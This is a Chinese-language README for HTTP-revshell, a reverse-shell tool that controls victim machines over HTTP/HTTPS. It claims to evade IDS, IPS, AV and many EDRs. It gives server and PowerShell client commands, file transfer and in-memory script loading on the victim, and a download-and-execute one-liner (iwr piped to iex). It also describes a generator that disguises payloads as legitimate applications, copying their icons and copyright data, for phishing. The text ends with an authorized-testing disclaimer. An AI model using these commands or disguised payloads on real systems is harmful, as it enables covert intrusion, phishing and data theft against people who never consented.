HTTP-revshell 是一个专注于红队演练和渗透测试人员的工具。该工具通过 HTTP/HTTPS 协议提供反向连接。它利用隐蔽信道,通过 Web 请求获取对受害机器的控制,从而规避 IDS、IPS 和 AV 等解决方案。
注意:该工具后续不会在免杀方面进行维护。只需进行少量修改,就能绕过市面上许多 EDR。

服务端使用方式:
usage: server.py [-h] [--ssl] [--autocomplete] host port
positional arguments:
host 监听主机
port 监听端口
optional arguments:
-h, --help 显示帮助信息并退出
--ssl 通过 SSL 传输流量
--autocomplete 自动补全 powershell 函数
客户端使用方式:
Import-Module .\Invoke-WebRev.ps1
Invoke-WebRev -ip IP -port PORT [-ssl]
git clone https://github.com/3v4Si0N/HTTP-revshell.git
cd HTTP-revshell/
pip3 install -r requirements.txt
该功能允许你向受害机器上传任意文件。
用法:
upload /src/path/file C:\dest\path\file
该功能允许你向攻击机器下载文件。
用法:
download C:\src\path\file /dst/path/file
该功能允许你从 powershell 脚本加载内容,而无需写入受害磁盘,通过合法的 HTTP 流量读取文件。
用法:
loadps1 /path/to/the/local/server/PowershellScript.ps1
该脚本允许你创建一个可执行文件,其中包含使用 HTTP-revshell 所需的载荷,只需按照屏幕上的指示即可生成。提供了 6 个预定义模板和一个可自定义模板,你可以选择喜欢的数据。
工具生成的载荷会整合合法应用的图标,以及原始应用的产品和版权信息。此外,每个载荷在建立与服务端的连接之前会先打开原始应用,模仿一个合法应用。这可用于钓鱼或红队演练。
载荷生成器使用方式:
powershell "iwr -useb https://raw.githubusercontent.com/3v4Si0N/HTTP-revshell/master/Revshell-Generator.ps1 | iex"

重要提示:预定义模板中的所有字段在按回车键时自动填写。
本脚本基于 LGPLv3+ 许可。直接链接至 许可文件。
HTTP-revshell 仅应用于授权渗透测试和/或非盈利教育目的。任何滥用本软件的行为,作者及其他协作者概不负责。请在你自己的服务器上或获得服务器所有者许可的情况下使用。